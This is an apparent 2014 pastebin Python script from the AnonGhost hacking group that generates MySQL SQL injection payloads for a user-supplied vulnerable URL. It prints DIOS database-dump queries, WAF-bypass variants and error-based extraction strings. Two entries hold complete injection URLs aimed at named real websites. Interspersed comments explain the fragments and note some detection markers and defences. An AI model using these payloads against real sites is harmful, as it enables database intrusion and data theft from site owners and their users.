Googleinurl

[SCRIPT]=> AnonGhost Auto SQLi Query Maker

Sep 9th, 2014
  1. #/!python
  2. import time
  3.  
  # Console banner followed by the single free-form input the script uses.
  # Python 2 syntax (print statement, raw_input). The only calls made here
  # are time.sleep(), print and raw_input(); no network connection is opened.
  4. time.sleep(.5)
  5. print "\n        ---####################################################---"
  6. print "      -----#                                                  #-----"
  7. print "   --------#       AnonGhost Auto SQLi Query Maker            #--------"
  8. print "      -----#                   Coded By -tr0jAn*              #-----"
  9. print "        ---#                                                  #---"
  10. print "          -####################################################-\n\n"
  11. time.sleep(.7)
  12. print "\n Greets To :\n ------------------------------------------------------------------------------\nrummykhan :: MakMan :: madcodE :: Mauritania Attacker :: HusseiN98d :: Kai H4x0r :: j0k3r :: Ch3rn0by1 :: vIrkId :: Zen :: Mr.Nob :: Shafoon :: G~26 :: madblood :: Str!k3r :: No~FacE :: Tech Prospect :: ajkaro \n---------------------------- PCP :: PHC :: AnonGhost ---------------------------"
  13. time.sleep(1)
  14. print "\n"
  # `url` is stored exactly as typed: it is not parsed, validated or
  # contacted, only concatenated in front of a canned SQL fragment later on.
  15. url = raw_input("Website Vulnerable URL : ")
  16.  
  17.  
  18. #               username = "test"
  19. #               if(username !='trojan' or username !='anonghost' or username !='test'):
  20. #                   print "Invalid ! Please Enter The Correct Login"
  21. #               else:
  22. #                   continue
  23.  
  # Static strings printed by the menu further down. Nothing in this run is
  # computed: the only variable part of any printed result is `url`.
  # `rp` is the usage hint appended to most results; it says the text is
  # meant to be pasted into a browser URL bar, so these fragments would be
  # seen by a server as part of a request's query string.
  24. rp = "Just Paste This In 'Hackbar' OR 'URL Bar' And After It Do The UNION SELECTION.. Then Replace The Vulnerable Column With @x And See The MAGIC :D"
  # MySQL fragments that read information_schema (tables, columns, schemata),
  # mostly filtered on table_schema=database(), and accumulate the names in a
  # user variable. 0x3c62723e is the hex spelling of an HTML line-break tag, so
  # the result is meant to be rendered inside the page's own HTML output.
  # Names ending in "wf" are the variants offered in the WAF branch of the
  # menu: they wrap keywords in MySQL versioned comments (/*!00000select*/,
  # /*!from*/) and split identifiers with empty comments (/**/). A filter that
  # matches literal keywords does not see those; matching after URL-decoding,
  # comment stripping and case folding does.
  # Markers that recur across the set: "information_schema", "@:=", "/*!" and
  # long 0x... literals in a request parameter.
  # information_schema only lists objects the connected account has privileges
  # on, so a narrowly privileged application account limits what these return;
  # parameterised queries remove the injection point itself.
  25. sdt = "div @x:=concat((select(@)from(Select(@:=0x00),(@r:=0),(select(@)from(information_schema.tables)Where(table_schema=database())and(@)in(@:=concat(@,0x3c62723e,LPAD(@r:=@r%2b1,2,0x30),0x2e20,unhex(hex(table_name))))))x))"
  26. sdtc = "div @x:=concat((select(@)from(Select(@:=0x00),(select(@)from(information_schema.columns)Where(table_schema=database())and(@)in(@:=concat(@,0x3c62723e,unhex(hex(table_name)),0x203a3a3a20,unhex(hex(column_name))))))x))"
  27. gct = "div @x:=concat(if(@a!=0,@a:=0,@a:=0),0x3c62723e3c62723e,(select unhex(hex(group_concat(lpad(@a:=@a%2b1,2,0x30),0x2e20,table_name separator 0x3c62723e))) from information_schema.tables where table_schema=database()))"
  28. dtwf = "div @x:=concat/*!((/*!00000select*/ (@) /*!from*/ (/*!00000select*/ (@:=0x00),(@r:=0),(/*!00000select*/ (@) from(information_schema./**/tables)where(table_schema=database())and(@)in(@:=concat/*!(@,0x3c62723e,LPAD(@r:=@r%2b1,2,0x30),0x2e20,unhex(hex(table_name))))))x))*/"
  29. dtcwf = "div @x:=concat/*!((/*!00000select*/ (@) /*!from*/ (/*!00000select*/ (@:=0x00),(@r:=0),(/*!00000select*/ (@) from(information_schema./**/columns)where(table_schema=database())and(@)in(@:=concat/*!(@,0x3c62723e,unhex(hex(table_name)),0x203a3a20,unhex(hex(column_name))))))x))*/"
  30. mdwf = "div @x:=concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@)/*!from*/(/*!12345selEcT*/(@:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@:=Concat/*!(@, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/"
  31. mds = "div @x:=unhex(hex(concat(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,concat(concat(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203a3a203c2f666f6e743e3c2f63656e7465723e3c2f623e),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),concat(0x3c62723e3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c62723e546f74616c205461626c657320496e20416c6c20446174616261736573203a3a20,(select count(*) from information_Schema.tables),0x3c62723e5461626c657320436f756e7420496e205072696d617279204461746162617365203a3a20,(Select count(*) from information_Schema.tables where table_schema=database()),(select(@)from(select(@:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(select(0) from(information_schema.columns)where(table_schema=database()) and(0x00)in(@:=Concat(@, 0x3c62723e, if( (@tbl!=table_name), Concat(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,LPAD(@r:=@r%2B1, 2, 0x30),0x2e,@tbl:=table_name,0x3c666f6e7420636f6c6f723d626c61636b3e203a3a20436f6c756d6e7320496e2054686973205461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@tbl),0x20284461746162617365203a3a20,database(),0x29,0x3c2f666f6e743e,0x3c62723e), 0x00),0x203a3a20,0x3c666f6e7420636f6c6f723d677265656e2073697a653d323e,0x7e20,column_name,0x3c2f666f6e743e ))))x))))))"
  32. dd = "div @x:=concat((select(@)from(select(@:=0x00),(select(@)from(information_schema.schemata)where(@)in(@:=concat(@,0x3c62723e,unhex(hex(schema_name))))))x))"
  33. ddwf = "div @x:=concat/*!((/*!00000select*/(@)/*!from*/(/*!00000select*/(@:=0x00),(/*!00000select*/(@)from(information_schema./**/schemata)where(@)in(@:=concat/*!(@,0x3c62723e,unhex(hex(schema_name))))))x))*/"
  34. gcd = "div @x:=concat(if(@a!=0,@a:=0,@a:=0),0x3c62723e3c62723e,(select group_concat(lpad(@a:=@a%2b1,2,0x30),0x2e20,unhex(hex(schema_name)) separator 0x3c62723e) from information_Schema.schemata))"
  35. bdz = "div @x:=(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))"
  36. bdzwf = "div @x:=(/*!00000select*/(/*!00000select*/ concat/*!(@:=0xa7,(/*!00000select*/ count(*)/*!from*/(information_schema./**/columns)where(table_schema=database())and(@:=concat/*!(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)*/))"
  37. bmb = "div @x:=(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where(table_schema=database())and @:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))"
  38. bmbwf = "div @x:=(/*!00000Select*/ export_set(5,@:=0,(/*!00000select*/ count(*)/*!from*/(information_schema./**/columns)where(table_schema=database()) and @:=export_set(5,export_set(5,@,/*!table_name*/,0x3c6c693e,2),/*!column_name*/,0x203a3a20,2)),@,2))"
  39. msd = "div @x:=make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where(table_schema=database())and @:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)"
  40. msdwf = "div @x:=make_set(6,@:=0x0a,(/*!00000select*/(1)/*!from*/(information_schema./**/columns)where(table_schema=database())and @:=make_set(511,@,0x3c6c693e,/*!table_name*/,0x203a3a20,/*!column_name*/)),@)"
  # bkt / bktwf (and myb below) use benchmark() as a repeat construct around
  # an inner SELECT rather than for timing. dec / dewc and their "wf" forms
  # drop the table_schema=database() filter and read every schema's columns.
  41. bkt = "div @x:=concat(@i:=0x00,@x:=0x00,benchmark(10,@x:=CONCAT(@x,(SELECT concat(0x3c62723e,@i:=table_name) from information_schema.tables where (table_schema=database()) and table_name >@i order by table_name LIMIT 1))),@x)"
  42. dec = "div @x:=(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_schema,0x203a3a20,table_name,0x203a3a20,column_name))),@)))"
  43. dewc = "div @x:=make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where @:=make_set(511,@,0x3c6c693e,table_name,0x203a20,table_name,0x203a20,column_name)),@)"
  44. bktwf = "div @x:=concat/*!(@i:=0x00,@y:=0x00,benchmark(10,@y:=CONCAT/*!(@y,(/*!00000SELECT*/ concat/*!(0x3c62723e,@i:=table_name) /*!from*/ information_schema./**/tables where (table_schema=database()) and table_name >@i order by table_name LIMIT 1))),@y)"
  45. decwf = "div @x:=(/*!00000select*/(/*!00000select*/ concat/*!(@:=0xa7,(/*!00000select*/ count(*)/*!from*/(information_schema./**/columns)where(@:=concat/*!(@,0x3c6c693e,table_schema,0x202d2d2d3e20,table_name,0x203a3a20,column_name))),@)*/))"
  46. dewcwf = "div @x:=make_set(6,@:=0x0a,(/*!00000select*/(1)/*!from*/(information_schema./**/columns)where@:=make_set(511,@,0x3c6c693e,/*!table_schema*/,0x203a3a20,/*!table_name*/,0x203a3a20,/*!column_name*/)),@)"
  # ueb percent-encodes single letters inside keywords (%63oncaT, %53elECt,
  # %55nion); escb and hwb wrap every argument in its own parentheses and hwb
  # also encodes the comment terminator as *%2f. All three still contain the
  # plain text "schema.tables" or "columns" once the request is URL-decoded.
  47. ueb = "div @x:=%63oncaT((%53elECt (@x) %66rom (%53elECt (@x:=0x00),(@r:=0),(%53elECt (0) from(%69nformation_schema.tables)%77here (%74ablE_schema=database()) and (0x00) in (@x:=%63oncat (@x,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,2,0x30),0x2920,0x3c2f666f6e743e,%74able_name))))x)) %55nion %53elect "
  48. escb = "div @x:=(concat_ws((0x0),(select(@)from(select(@:=0x00),(@r:=0),(select(@)from(informatioN_schema.tables)where(table_Schema=database())and(@)in(@:=concat_ws((0x0),(@),(0x3c62723e),(LPAD((@r:=@r%2b1),(2),(0x30))),(0x2e20),(table_name),(0x0)))))x))))UNION(select([No.Of Cols Here With Separate Brackets like (1),(2),(3)])"
  49. hwb = "div @x:=concat_ws(0x00,(/*!00000select*%2f(@)/*!from*%2f(/*!00000select*%2f(@:=0x00),(/*!00000select*%2f(@)/*!from*%2f(/*!information_schema*%2f.columns)/*!where*%2f(table_schema=database/*!()*%2f)and(0x00)in/*!(@:=concat_ws(0x00,(@),(0x3c62723e),(table_name),(0x203a3a20),(column_name))*%2f)))x))"
  50. myb = "div @x:=concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e7e7472306a416e2a203a3a3c666f6e7420636f6c6f723d626c75653e20,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)"
  # uniq1 and uniq2 are complete request strings with fixed third-party hosts
  # baked in; unlike every other entry they do not use `url`. uniq2 separates
  # its keywords with %23<filler>%0a, i.e. a '#' comment that runs to a
  # URL-encoded newline.
  51. uniq1 = "http://www.grandprix-tunis.gov.tn/en/index1.php?id=-21 /*!UNION*%2f /*!SELECT*%2f (1),concat_ws(0x00,(/*!00000select*%2f(@)/*!from*%2f(/*!00000select*%2f(@:=0x00),(/*!00000select*%2f(@)/*!from*%2f(/*!information_schema*%2f.columns)/*!where*%2f(table_schema=database/*!()*%2f)and(0x00)in/*!(@:=concat_ws(0x00,(@),(0x3c62723e),(table_name),(0x203a3a20),(column_name))*%2f)))x)),(3),(4),(5)"
  52. uniq2 = "http://uit.com.pk/uit_2.php?id=2 div 0 union%23BBBBBBBBUUUUUUUUUUUFFFFFFFFFFFFFFFEEEEEEEEEEEEERRRRRRRRRRRRRRRR...OOOOOOOOVVVVVVVEEEEEEEEEERRRRRRRRRRRRRFFFFFFFLLLLLLLLLLLOOOOOOOOOOWWWWWWWWWWWW%0aselect 1,concat%23aaaaaaaaaaaaa%0a(' :: Injected By -tr0jAn* :: ' ,version%23aaaaaaaaa..aa%0a(),' :: ',database%23aaaaaa%0a()),0x0"
  # Error-based fragments. xp / xpwf / xpt / xptwf pass a ':'-prefixed value
  # to updatexml() as the XPath argument, and err / dq group by
  # floor(rand(0)*2); in both cases the selected value is expected to come
  # back inside the database error text. They yield nothing when the
  # application does not return database error messages to the client.
  53. xp = " and updatexml(0x3a,concat(0x3a,version()),null) "
  54. xpwf = " and updatexml(0x3a,concat/*!(0x3a,version())*/,null) "
  55. err = " or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1"
  56. dq = " and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char), 0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"
  57. xptwf = " and updatexml(0x3a,concat/*!(0x3a,(/*!00000SelEcT*/ concat/*!(table_name)*/ /*!from*/ information_schema./**/tables where table_schema=database() limit 0,1))*/,null) "
  58. xpt = " and updatexml(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),null) "
  # UNION SELECT templates; the bracketed text is a placeholder the operator
  # replaces by hand. `unf` is the versioned-comment form used in the WAF menu.
  59. un = "UnIoN SeLEcT [No. Of Columns Here .. ]"
  60. unf = "/*!00000UniOn*/ /*!00000SelEcT*/ [No . Of Columns Here .. ]"
  61.  
  # Cosmetic pause and message only; nothing is loaded or fetched here.
  62. time.sleep(1)
  63. print "\nLoading..\n"
  64. time.sleep(.5)
  65. #    $ch==($sh)length-($g)
  66. #      while $ch != $sh
  67. #           $g == $sh
  68.  
  # Menu dispatch. The answer to "WAF ?" selects one of two menus; the code
  # typed next selects one canned fragment, which is printed as
  # url + fragment, for most entries followed by a UNION SELECT template
  # (`unf` in the WAF menu, `un` otherwise) and the `rp` usage hint.
  # Answers and codes are compared as exact strings ('01'..'16' in the WAF
  # menu, '001'..'017' otherwise); anything else prints an error line.
  # All output goes to stdout: this block sends nothing and reads nothing
  # other than the operator's answers.
  69. waf =  raw_input("WAF ? Y or N : ")
  70.  
  71. if(waf =='y' or waf =='Y' or  waf =='yes' or waf =='YES' or waf =='Yes'):
  72.         time.sleep(.5)
  73.         print "\nLoading Data .. "
  74.         time.sleep(.6)
  75.         print "\n## :: WAF Bypassed Queries :: ## \n"
  76.         print "\nCODE :: --Queries "
  77.         print "01 -- -- Tables DIOS WAF Bypassed"
  78.         print "02 -- -- Tables With Columns DIOS WAF Bypassed "
  79.         print "03 -- -- TrojAn DIOS Query WAF Bypassed"
  80.         print "04 -- -- XPATH Injection WAF Bypassed "
  81.         print "05 -- -- Databases DIOS WAF Bypassed"
  82.         print "06 -- -- Escape Character DIOS WAF Bypassed "
  83.         print "07 -- -- URL Encoding DIOS WAF Bypassed "
  84.         print "08 -- -- High WAF DIOS Tables With Columns Bypassed "
  85.         print "09 -- -- DIOS By Dr.Z3r0 WAF Bypassed "
  86.         print "10 -- -- DIOS By Mad Blood WAF Bypassed "
  87.         print "11 -- -- DIOS Without Concat WAF Bypassed "
  88.         print "12 -- -- Tables DIOS Using Benchmark() WAF Bypassed "
  89.         print "13 -- -- Dumping Everything In One Shot WAF Bypassed "
  90.         print "14 -- -- Dumping Everything In One Shot Without Concat WAF Bypassed"
  91.         print "15 -- -- Unique WAF Site Bypassed "
  92.         print "16 -- -- Unique Buffer OverFlow Site Bypassed "
  93.        
  94.        
  95.         print "\n"
  96.         askwf = raw_input("What Query Do You Want ? .. Please Enter Code : ")
  97.         time.sleep(.7)
  98.         print "\nLoading Your Query "
  99.         time.sleep(.5)
  100.         if(askwf =='01'):
  101.             print "\nTables DIOS WAF Bypassed\n"
  102.             time.sleep(.8)
  103.             print url + " " + dtwf + unf + " " + "\n\n" + rp
  104.         elif(askwf =='02'):
  105.             print "\n Tables With Columns DIOS WAF Bypassed\n"
  106.             time.sleep(.8)
  107.             print url + " " + dtcwf + " " + unf + "\n\n" + rp
  108.         elif(askwf =='03'):
  109.             print "\nTrojAn DIOS Query WAF Bypassed\n"
  110.             time.sleep(.8)
  111.             print url + " " + mdwf + " " + unf + "\n\n" + rp
  # Error-based entry: no UNION template or `rp` hint is appended, and the
  # table-name variant is printed only after a second yes/no prompt.
  112.         elif(askwf =='04'):
  113.             print "\nXPATH Injection WAF Bypassed"
  114.             time.sleep(.8)
  115.             print url + xpwf + "\n"
  116.             time.sleep(.6)
  117.             print "\n"
  118.             xpask = raw_input("Grab Tables ? Y or N :")
  119.             time.sleep(.8)
  120.             if(xpask =='y' or xpask =='yes' or xpask =='Y' or xpask =='YES' or xpask =='Yes' or xpask =='Ye' or xpask =='ye'):
  121.                 print "XPATH Injection Getting Tables\n "
  122.                 time.sleep(.5)
  123.                 print url + xptwf + "\n\nIncrease The Limit By 0,1 to '1,1' -- '2,1' -- '3,1' For Getting All Other Tables "
  124.         elif(askwf =='05'):
  125.             print "\nDatabases DIOS WAF Bypassed\n"
  126.             time.sleep(.8)
  127.             print url + " " + ddwf + " " + unf + "\n\n" + rp
  128.         elif(askwf =='06'):
  129.             print "\nEscape Character DIOS Bypassed \n"
  130.             time.sleep(.8)
  131.             print url + " " + escb + " " + "\n\n" + rp
  132.         elif(askwf =='07'):
  133.             print "\nURL Encoding WAF Bypassed "
  134.             time.sleep(.8)
  135.             print url + " " + ueb + " " + "\n\n" + rp
  136.         elif(askwf =='08'):
  137.             print "\nHigh WAF Tables With Columns Bypassed \n"
  138.             time.sleep(.8)
  139.             print url + " " + hwb + " " + "/*!00000%55niOn*%2f /*!00000%53eLeCT*%2f [No. Of Columns Here With Separate Brackets like this (1),(2),(3)]" + "\n\n" + rp
  140.         elif(askwf =='09'):
  141.             print "\nDIOS By Dr.Z3r0 WAF Bypassed \n"
  142.             time.sleep(.8)
  143.             print url + " " + bdzwf + " " + unf + "\n\n" + rp
  144.         elif(askwf =='10'):
  145.             print "\nDIOS By MadBlood WAF Bypassed \n"
  146.             time.sleep(.8)
  147.             print url + " " + bmbwf + " " + unf + "\n\n" + rp
  148.         elif(askwf =='11'):
  149.             print "\n DIOS Without Concat WAF Bypassed \n"
  150.             time.sleep(.8)
  151.             print url + " " + msdwf + " " + unf + "\n\n" + rp
  152.         elif(askwf =='12'):
  153.             print "\nTables DIOS Using Benchmark WAF Bypassed \n"
  154.             time.sleep(.8)
  155.             print url + " " + bktwf + " " + unf + "\n\n" + rp
  156.         elif(askwf =='13'):
  157.             print "\nDumping Everything In One Shot WAF Bypassed \n"
  158.             time.sleep(.8)
  159.             print url + " " + decwf + " " + unf + "\n\n" + rp
  160.         elif(askwf =='14'):
  161.             print "\nDumping Everything In One Shot Without CONCAT WAF Bypassed\n"
  162.             time.sleep(.8)
  163.             print url + " " + dewcwf + " " + unf + "\n\n" + rp
  # Codes 15 and 16 print uniq1 / uniq2 unchanged; the `url` entered by the
  # operator is not used for these two entries.
  164.         elif(askwf =='15'):
  165.             print "\nUnique WAF Website Bypassed \n "
  166.             time.sleep(.8)
  167.             print "Query :: \n----------\n" + uniq1
  168.         elif(askwf =='16'):
  169.             print "\nUnique WAF [Buffer Overflow] Website Bypassed \n"
  170.             time.sleep(.8)
  171.             print "Query :: \n----------\n" + uniq2
  172.            
  173. #             $wf == $by(length-($g)
  174. #                   while $wf != $g
  175. #                       $by = $g
  176. #                       where $by == $wf
  177. #                       then print " $by " + " $g " + " wf "
  178. #                                   else die($g + $wf + $by):($b)
  179.                
  180.         else:
  181.             time.sleep(.8)
  182.             print "You Have Entered An Invalid Code .. "
  183.            
  184.            
  # Non-WAF menu: same structure, using the fragments without versioned
  # comments and the plain `un` template.
  185. elif(waf =='N' or waf =='n' or waf =='NO' or waf =='no' or waf =='No'):
  186.         print "## :: Simple Non-WAF Queries :: ## \n"
  187.         time.sleep(.7)
  188.         print "Loading Data .. "
  189.         time.sleep(.8)
  190.         print "\nCODE :: -- Queries \n"
  191.         print "001 -- -- Tables DIOS Simple "
  192.         print "002 -- -- Tables With Columns DIOS Simple "
  193.         print "003 -- -- Getting Tables With Group_concat Function "
  194.         print "004 -- -- TrojAn DIOS Query Simple "
  195.         print "005 -- -- XPATH Injection "
  196.         print "006 -- -- Databases DIOS "
  197.         print "007 -- -- Getting Databases With Group_concat Function"
  198.         print "008 -- -- Tables DIOS Using Benchmark() "
  199.         print "009 -- -- DIOS By Dr.Z3ro "
  200.         print "010 -- -- DIOS By Mad Blood "
  201.         print "011 -- -- DIOS Without Concat "
  202.         print "012 -- -- TrojAn Benchmark() Query "
  203.         print "013 -- -- Dump Everything With Concat "
  204.         print "014 -- -- Dump Everything Without Concat "
  205.         print "015 -- -- Escape Character Bypass "
  206.         print "016 -- -- Getting Version With Error Based Injection"
  207.         print "017 -- -- Getting Version With Double Query Injection "
  208.        
  209.         print "\n"
  210.         asks = raw_input("What Query Do You Want ? Enter Code : ")
  211.         time.sleep(.5)
  212.         print "Loading Your Query .."
  213.         time.sleep(.5)
  214.         if(asks == '001'):
  215.             print "\nTables DIOS Simple\n"
  216.             time.sleep(.8)
  217.             print url + " " + sdt + " " + un + "\n\n" + rp
  218.         elif(asks =='002'):
  219.             print "\nTables With Columns DIOS Simple\n"
  220.             time.sleep(.8)
  221.             print url + " " + sdtc + " " + un + "\n\n" + rp
  222.         elif(asks =='003'):
  223.             print "\nGetting Tables With Group_concat Function\n"
  224.             time.sleep(.8)
  225.             print url + " " + gct + " " + un + "\n\n" + rp
  226.         elif(asks =='004'):
  227.             print "\nTrojAn DIOS Query Simple\n"
  228.             time.sleep(.8)
  229.             print url + " " + mds + " " + un + "\n\n" + rp
  230.         elif(asks =='005'):
  231.             print "\nXPATH Injection\n"
  232.             time.sleep(.8)
  233.             print url + xp + "\n"
  234.             time.sleep(.6)
  235.             xpasks = raw_input("Grab Tables ? Y or N :")
  236.             if(xpasks =='y' or xpasks =='yes' or xpasks =='Y' or xpasks =='YES' or xpasks =='Yes' or xpasks =='Ye' or xpasks =='ye'):
  237.                 print "\nXPATH Injection Getting Tables\n "
  238.                 time.sleep(.5)
  239.                 print url + xpt + "\n\nIncrease The Limit By 0,1 to '1,1' -- '2,1' -- '3,1' For Getting All Other Tables "
  240.         elif(asks =='006'):
  241.             print "\nDatabases DIOS\n"
  242.             time.sleep(.8)
  243.             print url + " " + dd + " " + un + "\n\n" + rp
  244.         elif(asks =='007'):
  245.             print "\nGetting Databases With GROUP_CONCAT() Function\n"
  246.             time.sleep(.8)
  247.             print url + " " + gcd + " " + un + "\n\n" + rp
  248.         elif(asks =='008'):
  249.             print "\nTables DIOS Using Benchmark() \n"
  250.             time.sleep(.8)
  251.             print url + " " + bkt + " " + un + "\n\n" + rp
  252.         elif(asks =='009'):
  253.             print "\nDIOS by Dr.Z3ro\n"
  254.             time.sleep(.8)
  255.             print url + " " + bdz + " " + un + "\n\n" + rp
  256.         elif(asks =='010'):
  257.             print "\nDIOS By Mad Blood \n"
  258.             time.sleep(.8)
  259.             print url + " " + bmb + " " + un + "\n\n" + rp
  260.         elif(asks =='011'):
  261.             print "\nDIOS Without Concat\n"
  262.             time.sleep(.8)
  263.             print url + " " + msd + " " + un + "\n\n" + rp
  264.         elif(asks =='012'):
  265.             print "\nTrojAn Benchmark() Query\n"
  266.             time.sleep(.8)
  267.             print url + " " + myb + " " + un + "\n\n" + rp
  268.         elif(asks =='013'):
  269.             print "\nDump Everything With Concat Function\n"
  270.             time.sleep(.8)
  271.             print url + " " + dec + " " + un + "\n\n" + rp
  272.         elif(asks =='014'):
  273.             print "\nDump Everything Without Concat Function \n"
  274.             time.sleep(.8)
  275.             print url + " " + dewc + " " + un + "\n\n" + rp
  276.         elif(asks =='015'):
  277.             print "\n Escape Character Bypass \n"
  278.             time.sleep(.8)
  279.             print url + " " + escb + "\n\n" + rp
  # Codes 016 and 017 are the error-based version probes; like 005 they are
  # printed without a UNION template or the `rp` hint.
  280.         elif(asks =='016'):
  281.             print "\nGetting Version With Error Based Injection\n"
  282.             time.sleep(.8)
  283.             print url + err + "\n\n"
  284.         elif(asks =='017'):
  285.             print "\nGetting Version With Double Query Injection\n"
  286.             time.sleep(.8)
  287.             print url + dq + "\n\n"
  288.        
  289. #                  $nb == $qr(length-($s))
  290. #                       while $nb != $qr
  291. #                        then $nb == $s
  292. #                   else $qr != $s
  293. #                           split $length-($s + $nb + $qr )
  294.                
  295.        
  296.         else:
  297.             time.sleep(.8)
  298.             print "You Have Entered An Invalid Code "
  299.        
  300. else:
  301.         print "You Have Entered An Incorrect Data"
  302.        
  303.        
  304.  
  # Exit messages with fixed delays. The script opened no files or
  # connections, so there is nothing to release here.
  305. time.sleep(2)
  306. print "\n\n\nClosing All Functions.."
  307. time.sleep(1)
  308. print "Exiting.."
  309. time.sleep(3.5)